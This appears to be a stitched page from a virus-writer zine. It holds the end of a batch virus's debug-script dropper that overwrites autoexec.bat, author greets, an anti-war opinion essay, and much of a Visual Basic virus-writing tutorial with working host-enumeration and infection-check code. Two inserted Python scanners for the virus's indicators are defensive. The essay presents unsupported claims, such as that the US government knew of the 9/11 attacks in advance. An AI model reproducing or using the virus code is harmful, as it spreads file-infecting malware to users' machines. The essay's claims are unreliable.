3E 6E 75 6C 0D 0A 69 66 20 6E 6F 74 20>>b.bat @echo e 01D0 65 72 72 6F 72 6C 65 76 65 6C 20 31 20 67 6F 74>>b.bat @echo e 01E0 6F 20 77 65 64 20 0D 0A 66 69 6E 64 20 2F 63 20>>b.bat @echo e 01F0 2F 69 20 22 74 68 75 22 20 74 2E 6C 20 3E 6E 75>>b.bat @echo e 0200 6C 0D 0A 69 66 20 6E 6F 74 20 65 72 72 6F 72 6C>>b.bat @echo e 0210 65 76 65 6C 20 31 20 67 6F 74 6F 20 74 68 75 20>>b.bat @echo e 0220 0D 0A 66 69 6E 64 20 2F 63 20 2F 69 20 22 
66 72>>b.bat @echo e 0230 69 22 20 74 2E 6C 20 3E 6E 75 6C 0D 0A 69 66 20>>b.bat @echo e 0240 6E 6F 74 20 65 72 72 6F 72 6C 65 76 65 6C 20 31>>b.bat @echo e 0250 20 67 6F 74 6F 20 66 72 69 20 0D 0A 66 69 6E 64>>b.bat @echo e 0260 20 2F 63 20 2F 69 20 22 73 61 74 22 20 74 2E 6C>>b.bat @echo e 0270 20 3E 6E 75 6C 0D 0A 69 66 20 6E 6F 74 20 65 72>>b.bat @echo e 0280 72 6F 72 6C 65 76 65 6C 20 31 20 67 6F 74 6F 20>>b.bat @echo e 0290 73 61 74 20 0D 0A 66 69 6E 64 20 2F 63 20 2F 69>>b.bat @echo e 02A0 20 22 73 75 6E 22 20 74 2E 6C 20 3E 6E 75 6C 0D>>b.bat @echo e 02B0 0A 69 66 20 6E 6F 74 20 65 72 72 6F 72 6C 65 76>>b.bat @echo e 02C0 65 6C 20 31 20 67 6F 74 6F 20 73 75 6E 20 0D 0A>>b.bat @echo e 02D0 20 0D 0A 3A 6D 6F 6E 20 0D 0A 63 6C 73 20 0D 0A>>b.bat @echo e 02E0 65 63 68 6F 20 4D 61 73 73 61 67 65 20 6F 66 20>>b.bat @echo e 02F0 74 68 65 20 64 61 79 20 0D 0A 65 63 68 6F 2E 20>>b.bat @echo e 0300 0D 0A 65 63 68 6F 20 22 57 68 61 74 20 77 61 73>>b.bat @echo e 0310 20 49 20 74 61 6C 6B 69 6E 67 20 61 62 6F 75 74>>b.bat @echo e 0320 20 6A 75 73 74 20 6E 6F 77 3F 20 49 20 6A 75 73>>b.bat @echo e 0330 74 20 63 61 6E 27 74 20 72 65 6D 65 6D 62 65 72>>b.bat @echo e 0340 22 20 0D 0A 65 63 68 6F 20 20 20 20 20 20 20 20>>b.bat @echo e 0350 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20>>b.bat @echo e 0360 20 20 20 20 20 20 2D 20 55 53 20 70 72 65 73 69>>b.bat @echo e 0370 64 65 6E 74 20 47 2E 20 57 2E 20 42 75 73 68 20>>b.bat @echo e 0380 0D 0A 70 61 75 73 65 3E 6E 75 6C 20 0D 0A 67 6F>>b.bat @echo e 0390 74 6F 20 65 6E 64 20 0D 0A 20 0D 0A 3A 74 75 65>>b.bat @echo e 03A0 20 0D 0A 63 6C 73 20 0D 0A 65 63 68 6F 20 4D 61>>b.bat @echo e 03B0 73 73 61 67 65 20 6F 66 20 74 68 65 20 64 61 79>>b.bat @echo e 03C0 20 0D 0A 65 63 68 6F 2E 20 0D 0A 65 63 68 6F 20>>b.bat @echo e 03D0 22 54 68 65 20 77 61 72 20 69 6E 20 49 72 61 71>>b.bat @echo e 03E0 20 69 73 20 6A 75 73 74 69 66 69 65 64 20 61 73>>b.bat @echo e 03F0 20 49 20 77 61 6E 74 20 74 6F 20 67 65 74 20 72>>b.bat @echo e 0400 
69 64 20 6F 66 20 74 68 65 20 57 65 70 70 6F 6E>>b.bat @echo e 0410 73 20 6F 66 20 4D 61 73 68 20 0D 0A 65 63 68 6F>>b.bat @echo e 0420 20 20 44 79 73 74 72 75 63 6B 73 79 6E 2E 22 20>>b.bat @echo e 0430 0D 0A 65 63 68 6F 20 20 20 20 20 2D 55 53 20 50>>b.bat @echo e 0440 72 65 73 69 64 65 6E 74 20 47 2E 20 57 2E 20 42>>b.bat @echo e 0450 75 73 68 20 77 72 69 74 65 73 20 61 62 6F 75 74>>b.bat @echo e 0460 20 77 68 79 20 69 74 20 69 73 20 6A 75 73 74 69>>b.bat @echo e 0470 66 69 65 64 20 74 6F 20 67 6F 20 74 6F 20 77 61>>b.bat @echo e 0480 72 20 0D 0A 70 61 75 73 65 3E 6E 75 6C 20 0D 0A>>b.bat @echo e 0490 67 6F 74 6F 20 65 6E 64 20 0D 0A 20 0D 0A 3A 77>>b.bat @echo e 04A0 65 64 20 0D 0A 63 6C 73 20 0D 0A 65 63 68 6F 20>>b.bat @echo e 04B0 4D 61 73 73 61 67 65 20 6F 66 20 74 68 65 20 64>>b.bat @echo e 04C0 61 79 0D 0A 65 63 68 6F 2E 20 0D 0A 65 63 68 6F>>b.bat @echo e 04D0 20 22 49 6D 70 72 65 61 63 68 20 54 68 61 74 20>>b.bat @echo e 04E0 42 61 73 74 61 72 64 20 21 21 22 20 0D 0A 65 63>>b.bat @echo e 04F0 68 6F 20 20 20 20 20 20 20 20 2D 20 50 72 6F 74>>b.bat @echo e 0500 65 73 74 65 72 20 73 69 67 6E 20 64 75 72 69 6E>>b.bat @echo e 0510 67 20 74 68 65 20 49 72 61 71 69 20 77 61 72 20>>b.bat @echo e 0520 0D 0A 70 61 75 73 65 3E 6E 75 6C 20 0D 0A 67 6F>>b.bat @echo e 0530 74 6F 20 65 6E 64 20 0D 0A 0D 0A 3A 74 68 75 20>>b.bat @echo e 0540 0D 0A 63 6C 73 20 0D 0A 65 63 68 6F 20 4D 61 73>>b.bat @echo e 0550 73 61 67 65 20 6F 66 20 74 68 65 20 64 61 79 20>>b.bat @echo e 0560 0D 0A 65 63 68 6F 2E 20 0D 0A 65 63 68 6F 20 22>>b.bat @echo e 0570 48 65 20 6C 6F 6F 6B 73 20 6C 69 6B 65 20 74 68>>b.bat @echo e 0580 65 20 41 6D 65 72 69 63 61 6E 20 4C 69 63 65 22>>b.bat @echo e 0590 20 0D 0A 65 63 68 6F 20 20 20 20 20 20 20 20 20>>b.bat @echo e 05A0 20 20 20 2D 20 4D 61 64 6F 6E 6E 61 2C 73 61 79>>b.bat @echo e 05B0 69 6E 67 20 61 62 6F 75 74 20 55 73 20 50 72 65>>b.bat @echo e 05C0 73 69 64 65 6E 74 20 47 2E 20 57 2E 20 42 75 73>>b.bat @echo e 05D0 68 20 0D 0A 70 61 75 73 65 
3E 6E 75 6C 20 0D 0A>>b.bat @echo e 05E0 67 6F 74 6F 20 65 6E 64 20 0D 0A 0D 0A 3A 66 72>>b.bat @echo e 05F0 69 20 0D 0A 63 6C 73 20 0D 0A 65 63 68 6F 20 4D>>b.bat @echo e 0600 61 73 73 61 67 65 20 6F 66 20 74 68 65 20 44 61>>b.bat @echo e 0610 79 20 0D 0A 65 63 68 6F 2E 0D 0A 65 63 68 6F 20>>b.bat @echo e 0620 22 49 20 73 68 6F 75 6C 64 20 68 61 76 65 20 76>>b.bat @echo e 0630 6F 74 65 64 20 66 6F 72 20 41 6C 20 47 6F 72 65>>b.bat @echo e 0640 20 77 68 65 6E 20 49 20 67 6F 74 20 74 68 65 20>>b.bat @echo e 0650 63 68 61 6E 63 65 2E 22 20 0D 0A 65 63 68 6F 20>>b.bat @echo e 0660 20 20 20 20 20 20 20 20 20 20 2D 20 77 68 61 74>>b.bat @echo e 0670 20 61 20 35 30 20 79 65 61 72 20 6F 6C 64 20 6D>>b.bat @echo e 0680 61 6E 20 66 65 65 6C 73 20 61 62 6F 75 74 20 55>>b.bat @echo e 0690 53 20 50 72 65 73 69 64 65 6E 74 20 47 2E 20 57>>b.bat @echo e 06A0 2E 20 42 75 73 68 20 0D 0A 70 61 75 73 65 3E 6E>>b.bat @echo e 06B0 75 6C 20 0D 0A 67 6F 74 6F 20 65 6E 64 20 0D 0A>>b.bat @echo e 06C0 0D 0A 3A 73 61 74 20 0D 0A 63 6C 73 20 0D 0A 65>>b.bat @echo e 06D0 63 68 6F 20 4D 61 73 73 61 67 65 20 6F 66 20 74>>b.bat @echo e 06E0 68 65 20 64 61 79 20 0D 0A 65 63 68 6F 2E 0D 0A>>b.bat @echo e 06F0 65 63 68 6F 20 22 57 65 20 66 6F 75 6E 64 20 6E>>b.bat @echo e 0700 6F 20 57 4D 44 73 20 62 75 74 20 6C 6F 61 64 73>>b.bat @echo e 0710 20 6F 66 20 70 69 63 74 75 72 65 73 2C 70 6F 72>>b.bat @echo e 0720 74 72 61 69 74 73 20 61 6E 64 20 73 74 61 74 75>>b.bat @echo e 0730 65 73 20 6F 66 20 53 61 64 64 61 6D 22 20 0D 0A>>b.bat @echo e 0740 65 63 68 6F 20 20 20 20 20 20 20 20 20 20 20 20>>b.bat @echo e 0750 20 20 20 20 20 20 20 2D 20 61 20 55 53 20 73 6F>>b.bat @echo e 0760 6C 64 69 65 72 20 73 70 65 61 6B 73 20 6F 66 20>>b.bat @echo e 0770 74 68 65 20 49 72 61 71 69 20 77 61 72 20 0D 0A>>b.bat @echo e 0780 70 61 75 73 65 3E 6E 75 6C 20 0D 0A 67 6F 74 6F>>b.bat @echo e 0790 20 65 6E 64 20 0D 0A 0D 0A 3A 73 75 6E 20 0D 0A>>b.bat @echo e 07A0 63 6C 73 20 0D 0A 65 63 68 6F 20 4D 61 73 73 61>>b.bat 
@echo e 07B0 67 65 20 6F 66 20 74 68 65 20 64 61 79 20 0D 0A>>b.bat @echo e 07C0 65 63 68 6F 2E 0D 0A 65 63 68 6F 20 22 20 75 68>>b.bat @echo e 07D0 2E 2E 77 68 65 72 65 20 69 73 20 74 68 65 20 74>>b.bat @echo e 07E0 6F 69 6C 65 74 20 61 67 61 69 6E 3F 3F 20 22 20>>b.bat @echo e 07F0 0D 0A 65 63 68 6F 20 20 20 20 20 20 20 20 20 20>>b.bat @echo e 0800 2D 20 55 53 20 70 72 65 73 69 64 65 6E 74 20 64>>b.bat @echo e 0810 75 72 69 6E 67 20 68 69 73 20 73 74 61 79 20 61>>b.bat @echo e 0820 74 20 74 68 65 20 57 68 69 74 20 48 6F 75 73 65>>b.bat @echo e 0830 20 0D 0A 70 61 75 73 65 3E 6E 75 6C 20 0D 0A 67>>b.bat @echo e 0840 6F 74 6F 20 65 6E 64 20 0D 0A 0D 0A 3A 65 6E 64>>b.bat @echo e 0850 20 0D 0A 65 63 68 6F 2E 0D 0A 65 63 68 6F 20 54>>b.bat @echo e 0860 68 69 73 20 6D 61 73 73 61 67 65 20 69 73 20 62>>b.bat @echo e 0870 72 6F 75 67 68 74 20 74 6F 20 79 6F 75 20 62 79>>b.bat @echo e 0880 20 42 61 74 2E 42 75 73 68 20 0D 0A 65 63 68 6F>>b.bat @echo e 0890 20 42 61 74 2E 42 75 73 68 20 62 79 20 61 64 69>>b.bat @echo e 08A0 6F 75 73 20 5B 72 52 6C 66 5D 20 0D 0A 70 61 75>>b.bat @echo e 08B0 73 65 3E 6E 75 6C 20 0D 0A 64 65 6C 20 74 2E 6C>>b.bat @echo e 08C0 20 0D 0A 63 61 6C 6C 20 62 75 73 68 2E 62 61 74>>b.bat @echo e 08D0 0D 0A 77 69 6E 0D 0A 65 78 69 74 20 0D 0A 00>>b.bat echo rcx>>b.bat echo 7DE>>b.bat echo n%pat%autoexec.bat>>b.bat echo w>>b.bat echo q>>b.bat debug < b.bat del b.bat ::> Above code is the payload code.It would show everyday massages about the US president. ::> it also runs the virus for simple "residency". :fin exit =============================================[ end of code ]================================================== .:Greets:. 
Greets go to the few guys I really cared: Jackie [tantrum],Slage,RaiD,philie [rRlf],SPTH [rRlf],Industry [rRlf],Benny [29a],KD [metaphase] DvL,NeKro,Metal_ and the rest of the ppl I met on IRC (the good,the bad and the stupid m***********s) (non-vx)Irfan,taufik,hamizan,Frankie "Charmander" Wong,Han Kiat,Spencer,the 3NAs and all of the guys and gals that i've met IRL. Greets to groups (VX and Non-VX): rRlf,29a,Metaphase,eBCVG,b8,Tantrum,29a,MHA,haxors_Labs,r00t-access,the Medan Hacking Group and WoH. .:Contacts:. website: http:\\adiousinet.cjb.net or http:\\www.adious.tk email: adious666@hotmail.com group site:http:\\rrlf.de
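Seen from the responder's side, the listing above leaves three checkable traces: the `set shit=prick` guard stamped into every copy, decoy names such as `csc.EXE.bat` and `Madonna_A_Life.MP3.bat`, and a mIRC `script.ini` that DCC-sends a file on every JOIN. The scanner below is an added example written for this page, not part of adious's source; the rule names, the wider extension list and the sample tree (including the `c:\bush.bat` path) are assumptions constructed for the demonstration.

```python
import os
import re
import tempfile

# Indicators read off the Bat.Bush listing above.
MARKER_RE = re.compile(rb"set\s+shit=prick", re.I)               # guard variable carried by every copy
JOIN_RE = re.compile(rb"^n\d+=\s*on\s+\d+:JOIN:", re.I | re.M)   # mIRC remote "on JOIN" event
DCC_RE = re.compile(rb"dcc\s+send\s+\$nick\s+(\S+)", re.I)       # file pushed to whoever joins
# Assumption: generalised from csc.EXE.bat / *.MP3.bat to other decoy/script pairs.
DOUBLE_EXT_RE = re.compile(
    r"\.(exe|mp3|avi|mpg|jpg|gif|zip|doc|txt)\.(bat|cmd|com|pif|scr|vbs)$", re.I)
BATCH_EXTS = (".bat", ".cmd")
MAX_BYTES = 4 * 1024 * 1024  # batch files and script.ini are small; cap the read


def classify(path):
    """Return a list of (rule, detail) hits for one file."""
    name = os.path.basename(path)
    lower = name.lower()
    hits = []
    if DOUBLE_EXT_RE.search(name):
        hits.append(("double-extension", ""))
    is_batch = lower.endswith(BATCH_EXTS)
    is_mirc = lower == "script.ini"
    if not (is_batch or is_mirc):
        return hits
    try:
        with open(path, "rb") as fh:
            data = fh.read(MAX_BYTES)
    except OSError as exc:
        hits.append(("unreadable", str(exc)))
        return hits
    if is_batch and MARKER_RE.search(data):
        hits.append(("batbush-marker", ""))
    # An on-JOIN handler alone is common and benign; flag it only with an auto-send.
    if is_mirc and JOIN_RE.search(data):
        sent = DCC_RE.search(data)
        if sent:
            hits.append(("mirc-autosend", sent.group(1).decode("latin-1")))
    return hits


def scan_tree(root):
    """Walk root and return sorted (relative_path, rule, detail) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            for rule, detail in classify(full):
                findings.append((rel, rule, detail))
    return sorted(findings)


def make_constructed_sample(root):
    """Write a small constructed tree: two marked batches, one bad script.ini, clean files."""
    clean_bat = b"@echo off\r\necho nightly backup\r\n"
    stamped = clean_bat + b"\r\n@set shit=prick \r\n@echo off\r\n"
    files = {
        "shared/Madonna_A_Life.MP3.bat": stamped,
        "shared/real_song.mp3": b"ID3\x03\x00",
        "work/backup.bat": clean_bat,
        "work/old.bat": stamped,
        "mirc/script.ini": (b"[script]\r\nn0=on 1:JOIN:#:{ \r\n"
                            b"n1= /if ( nick == $me ) { halt } \r\n"
                            b"n2= /.dcc send $nick c:\\bush.bat \r\nn3= }\r\n"),
        "mirc_ok/script.ini": b"[script]\r\nn0=on 1:TEXT:!hello:#:{ msg $chan hi }\r\n",
    }
    for rel, content in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)


def demo_scan():
    """Build the constructed sample in a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        make_constructed_sample(root)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, rule, detail in demo_scan():
        print(f"{rule:18} {rel} {detail}")
```

The marker rule catches infected hosts that keep an ordinary name (`work/old.bat` in the sample), which the filename rule alone would miss.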

articles

Obvious stupidity of society Adious

Obvious stupidity of society by adious

.: Type : Opinions :.
.: Date : 21\03\04
.: By Adious [rRlf] :.

NOTE : This text has nothing to do with "How-to's" and tutorials. If your intention was to find valuable info on programming or anything else, this text will not be a help for you. Tough luck, huh? :)

.:Introduction:.

Ok, so you may want to know why I even want to write something like this: Mainly because of the low decline of the society that we live in for the last many years or so. The USA gov. decided to go to war last year in Iraq and it sickens me to the gut. The women and children dying. Then comes normal teenage shit: The overgrowing "need" for material things in life. Nobody taught them that "the clothes do not make the man" but every rapper would tell the kids that they need the "bling-bling" (rap for "the shit made of gold") to live and the over-emphasis on the "good life" (kazillions of dollars, mansion, blah, blah blah). These and more in this text called the "Obvious stupidity of society". I will write sequels to this text as and when I feel the need (freedom of movement!). Hope you enjoy the hour or so of reading this text.

-adious [rRlf]

"The only real weapon in war is the truth" - Inspired quote from a book. Greets to the person who originally said this :)

.: USA govs' decision to go to war: Biggest lie to human rights :.
.: and human life under the propagandical name of "war on terror":.

A long name for a subtitle? Well, that's what the world's biggest terrorist organisation stated after the 9/11 attacks on the WTC in NYC. There is proof that the government knew that the attacks would happen but did not act on the intelligence reports. Why? They wanted a reason for them to go to war in the Middle Eastern countries. Their new policy on "attacking rogue nations before they attack us" is just too stupid to comprehend by any intelligent human being on the face of this earth.
It's like saying: "Since I know that you would attack me, even if the answer from you is 'no', I would still attack you right now". I wonder why they attack people who are called "terrorist" without proof that they are really "terrorist". This goes to show that US government did not actually follow their own law: Everybody is innocent until proven guilty. Very hard to swallow, huh?

Back to the "war on terror", they went to the UN mandate for an attack on Iraq. Some of the nations, which have a brain and a heart, vetoed the idea. Bush used the term "Axis of Evil" on Iraq. Look at what happened to Afghanistan and you'll find a shock of your lives: They destroy lives and they just leave you to pick yourself up. They destroy buildings and peace but they like to say they are "building progress in the rebuilding of the country". Bullshit. They changed many times the reason for attacking Iraq:

1) There are weapons of mass destruction which the US has all the while. The US army has been developing "mini-nuke bunker busting" bombs to dig out terrorists. How's that for hypocritical?
2) They say that Iraq used to host terrorists in their country. The key word is "USED". They obviously forgot that Saddam is much of a changed man and that he would do anything, including letting foreign nuke inspectors come in. Hell, the US couldn't even find the bloody WMDs. Does it mean that the US gov is lying to the international community?
3) Here's the biggest lie in the face of the century. The people of Iraq want to be liberated. Hell, if they really want to be liberated, they should leave Iraq, but did they? NO, because they were already liberated from crime and they had peace in their country.

When Iraq started researching on making nuclear bombs, the USA started wagging their tongues on the danger that would happen when a rogue nation has the technology. But USA has nukes since they started using it on Japan during WW2.
They were the ones who started the idea of ICBMs (intercontinental ballistic missiles) and made (and tested) the first hydrogen bomb (or a thermonuclear bomb). I'm getting sick and tired of looking at this topic. The thing is, Bush has led us to a war that would never end and that would spawn new faces in the international terrorist scene. If they could give some efforts on having 6 way talks on the nuclear issue, why not with Iraq? Oh, I forgot Iraq has no WMDs at all! It's all an illusion in the myopic eyes of G. W. Bush. You decide, do you want to follow blindly the "idiots of war" or do you want to follow a man who is a good leader and would do his best to serve his country and the world? You decide.

.: Myth : Money makes the world go round :.

It's just too obvious that the many teens today are forced into the shell of which they can not really get out. We are *forced* by our peers to do this and that, wear this and that. This is bullshit. How many times do you actually walk out of the house in rather cheap but very comfortable clothes? I thought they would actually go and praise the person for a good choice of clothing but it turns out that the "normal" teenager would actually feel better in the most expensive clothing ever. It's very saddening that many people's happiness is actually dictated by the amount of money they get or have. They probably think that this has got to do with the material world that they live in today. If it were 20 years ago, many kids won't usually use very expensive clothing. How many people are very happy when they have less and less money? There are a few but most would like a very expensive lifestyle. Too much money in society would mean that we would not really form real relationships. Most ppl squabble over money. It seems that money is thicker than blood as many families fight over the wealth of their parents. Not only does it destroy families but your choices of life. Many people actually quit their fav. job for a higher paying one. Isn't it sad? I'm not gonna give half of my life away for a job that is not fun and cool for me. Let's kill the fad.

.: "Freedom" in the real world is just a word :.

There is a hell lot of truth when it comes to the lack of freedom of speech. I may not even speak on something so "hurtful" but the government wants to keep my freedom in control. But you know what, nothing could actually stop the fad of the internet and nobody could stop computer knowledge spreading. In Singapore, there is a lot of debate on the topic of blocking access to some websites. They must restrict ppl access to their fav sites just to be happy (I understand if they do this in school but I just don't see the point if you block internet access for personal use). Try going out to parks performing demonstrations and not to be touched by the pigs but to be kicked into a room being asked question after question and having your school application revoked. As long as my parents are alive on this earth, they will control me in doing some things but as I get older I will experience more freedom. But what type of freedom are you seeking for? What do you really want?

.: Hypocrites on the NET and in real life :.

Do you find it really funny when someone actually kinda hates your artwork that you've put on your website (for example) and that sick bastard did not actually create something? Well, this type of people kinda sucks some life out of you. Do you actually have a parent who actually asks you to be more hardworking in terms of work but when you look at their qualification exams that they took when they were our age, they did not score really well? Well what happens to us? In real life, nobody would give a damn of who you are and at some time you feel like there is no worth living, but in fact, there are some people that care for you. You only kinda overlooked the bad points from the good points.
Whether or not the things are going fine for you or that this is hell to you, is really what your mind thinks about. If your peers actually make fun of you, would you know that there are some people that actually care for you and in the end it's all that counts? Maybe that guy that made fun of you is a real sucker who kinda failed in everything and that they want respect by pushing ppl around. In life there are many hypocrites who feel that you are shit but in reality everyone is the same. Nobody has the right to make you feel sad and angry but you could overcome it. After all, "An eye for an eye makes the whole world blind" and "only stupid people get angry and let their frustrations control them". Always remember that people's opinions WILL NEVER follow yours, so why bother following the crowd. The real meaning of opinion is "a belief that is not proven to be true." If ppl's opinions are really true, they won't call it "opinions", they'll call it 'laws'. So think about it.

.: Ending :.

Arrrrghhh! Why the hell is it so soon? I'm sorry if I can't write some very long text for a good cause but I'll do so next time. Do you have an opinion to spread or a cause to make known? Write to me by e-mail.

.:Contacts:.

Website : www.adious.cjb.net

.: Parting words..:.

"Kill The trends and follow your own route"

[EOF] adious copyright 2004

articles

visual basic virus writing guide v1.0 Alcopaul ============================================================================================================================= ============================================================================================================================= ================================ alcopaul's visual basic virus writing guide v1.0 =========================================== ============================================================================================================================= ============================================================================================================================= \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ \\\\\\\\\\\\\\\\\\ I - introduction \\ \\\\\\\\\\\\\\\\\\\\ damn to time-and-bytes-consuming-long introductions... VB is RAD so boys and girls, LET'S GET IT ON! \\\\\\\\\\\\\\\\\\\\ II - preliminaries \\ \\\\\\\\\\\\\\\\\\\\\\ before going to the nitty gritties of vb file infection, we should tackle first the preliminary concepts... ************************* a) getting started ****** ************************* before starting to write a virus in visual basic, you should first know how to "speak" the visual basic language.. this means that you should know the proper syntaxing, the relation of the commands, the way of manipulating variables using the built in vb commands, etc... if you have microsoft office fully installed, then you'll surely have no problem of finding a visual basic resource and reference.. open windows explorer and search for VBLR6.chm... it contains the visual basic language reference... if win32asm has win32.hlp then visual basic has vblr6.chm... having a vb programming book is also helpful so you won't undergo the trial and error of testing functions against variables and combining functions to make a program... 
and also study viral and non viral vb sources coz this will surely help... before making it to the top, you must start first in scratch.. before i forget, you must also have Microsoft VB6 compiler... *************************** b) resolving virus path *** *************************** your first task is to resolve the path of the virus... why? so your virus can do its dirty work whether it's contained in any directory or the root directory.... ---------------------------------------- code II.a ---------------------------------------- dim virpath as string virpath = app.path if right(virpath, 1) <> "\" then virpath = virpath & "\" 'set virpath to (root):\ 'examine if path is a directory or subdirectory 'if yeah, resolve directory path by adding "\" ---------------------------------------- ******************************* c) avoiding identity crisis *** ******************************* we'll treat exe, scr, com, pif files as the same... why? try renaming your notepad.exe to notepad.scr and execute it. notepad window will appear... renaming notepad.exe to .com or .pif and executing it will have the same effect. the notepad window will still appear... you must first establish the identity of your virus... if you want to target exe files, you should make your virus treat itself as a ".exe" file... when a virus that treats itself as an exe file infects a .scr file, executing the infected .scr won't pass the control to the ".exe" virus... the virus assumes the file type of its host... so a ".exe" virus in a ".scr" host will treat itself as a ".scr"... so a ".exe" virus executed as a ".scr" will produce an error... in other words, your virus will have a problem with its identity... 
---------------------------------------- code II.b ---------------------------------------- dim virbyte1 as string dim virpath as string virpath = app.path if right(virpath, 1) <> "\" then virpath = virpath & "\" Open virpath & App.EXEName & ".exe" For Binary Access Read As #2 virbyte1 = Space(number of bytes) Get #2, , virbyte1 Close #2 'setting the virus identity ---------------------------------------- ******************************************************************************************************** d) identifying if the file is infected then a choice of infecting all files at once or one at a time *** ******************************************************************************************************** after establishing the identity of your virus, the next task is to do is to identify the target files... rule : virus will infect file types of its kind... ".exe" virus infects ".exe" files.. ".com" virus infects ".com" files.... ".scr" virus infects ".scr" files ... ".pif" virus infects ".pif" files... after the virus identifies the target files, check if the host is infected so it won't be infecting the same files again and again... a virus must not infect an infected file... an real world example : if you're infected with AIDS, then you'll NOT be reinfected by AIDS... --------------------------------------- code II.c.i --------------------------------------- dim hlen as string dim vsig as string dim virpath as string dim host as string virpath = app.path if right(virpath, 1) <> "\" then virpath = virpath & "\" Open virpath & host For Binary Access Read As #1 hlen = (LOF(1)) vsig = Space(hlen) Get #1, , vsig Close #1 marker = Right(vsig, 9) if marker = "signature" then 'search for more else 'infect --------------------------------------- why did i put 9 in marker = Right(vsig, 9)? coz the length of marker is 9... s-i-g-n-a-t-u-r-e = 9 if the host is infected then search for more... if the host is clean, your next task is to infect it... 
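The same end-of-file marker that code II.c.i reads back is what a scanner looks for: bytes stored after the last PE section (the overlay) never come from the linker, so a fixed tag at the very end of an executable stands out. The triage helper below is an added example from the defender's side, not code from this guide; it assumes the 9-byte placeholder `signature` used above and, as a further assumption, treats a second PE image inside the overlay as a sign that another program's bytes are being carried along. The sample files are constructed in memory.

```python
import struct

MARKER = b"signature"  # 9-byte placeholder marker from the guide's code II.c.i


def end_of_sections(data):
    """Return the file offset where the last PE section's raw data ends, or None if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size           # section table follows the optional header
    end = table + 40 * num_sections            # each section header is 40 bytes
    if end > len(data):
        return None
    for i in range(num_sections):
        raw_size, raw_ptr = struct.unpack_from("<II", data, table + 40 * i + 16)
        if raw_ptr:
            end = max(end, raw_ptr + raw_size)
    return min(end, len(data))


def find_embedded_pe(overlay):
    """Return the offset of the first valid-looking PE image inside the overlay, or None."""
    pos = overlay.find(b"MZ")
    while pos != -1:
        if end_of_sections(overlay[pos:]) is not None:
            return pos
        pos = overlay.find(b"MZ", pos + 1)
    return None


def inspect(data, markers=(MARKER,)):
    """Summarise overlay size, trailing marker and embedded PE for one file's bytes."""
    end = end_of_sections(data)
    if end is None:
        return {"pe": False, "overlay": 0, "marker": None, "embedded_pe": False}
    overlay = data[end:]
    return {
        "pe": True,
        "overlay": len(overlay),
        "marker": next((m for m in markers if overlay.endswith(m)), None),
        "embedded_pe": find_embedded_pe(overlay) is not None,
    }


def build_minimal_pe(body=b"\x90" * 0x200):
    """Constructed sample: smallest header set this parser needs, one section at 0x200."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x0102)
    sect = struct.pack("<8sIIIIIIHHI", b".text", len(body), 0x1000,
                       len(body), 0x200, 0, 0, 0, 0, 0x60000020)
    header = bytes(dos) + b"PE\0\0" + coff + sect
    return header.ljust(0x200, b"\0") + body


def demo_overlay():
    """Run the check over a clean image, one with benign padding, and one with a tagged overlay."""
    clean = build_minimal_pe()
    return {
        "clean": inspect(clean),
        "padded": inspect(clean + b"\0" * 16),
        "tagged": inspect(clean + build_minimal_pe(b"\xCC" * 0x200) + MARKER),
    }


if __name__ == "__main__":
    for name, result in demo_overlay().items():
        print(name, result)
```

An overlay on its own is only a triage signal, since Authenticode signatures and self-extracting installers also store data past the last section; the trailing marker and the embedded image are what narrow it down.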
you can make your virus infect all files at once or infect one file per run... for now, we'll only concern on virus infecting files in its own directory... ---------------------------------------- code II.c.ii (infect all at once) ---------------------------------------- dim virpath as string dim enumhosts as string dim a as string dim hosts, eachhost dim hlen as string dim vsig as string dim marker as string virpath = App.Path If Right(virpath, 1) <> "\" Then virpath = virpath & "\" enumhosts = Dir$(virpath & "*.exe") While enumhosts <> "" a = a & enumhosts & "/" enumhosts = Dir$ Wend hosts = Split(a, "/") For Each eachhost In hosts Open virpath & eachhost For Binary Access Read As #1 hlen = (LOF(1)) vsig = Space(hlen) Get #1, , vsig Close #1 marker = Right(vsig, 9) if marker = "signature" then '--------------- GoTo notinfected Else GoTo infected End If notinfected: 'infect eachhost infected: Next eachhost '--------------- ----------------------------------------- <<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>> ---------------------------------------- code II.c.iii (infect one file per run) ---------------------------------------- dim virpath as string dim enumhosts as string dim a as string dim hosts, eachhost dim hlen as string dim vsig as string dim marker as string virpath = App.Path If Right(virpath, 1) <> "\" Then virpath = virpath & "\" enumhosts = Dir$(virpath & "*.exe") While enumhosts <> "" a = a & enumhosts & "/" enumhosts = Dir$ Wend hosts = Split(a, "/") For Each eachhost In hosts Open virpath & eachhost For Binary Access Read As #1 hlen = (LOF(1)) vsig = Space(hlen) Get #1, , vsig Close #1 marker = Right(vsig, 9) if marker = "signature" then '---------------- GoTo notinfected Else GoTo infected End If notinfected: 'infect eachhost Exit For '!!! infected: Next eachhost '---------------- ----------------------------------------- variable enumhosts will enumerate all the ".exe" files in the current directory with the virus.... 
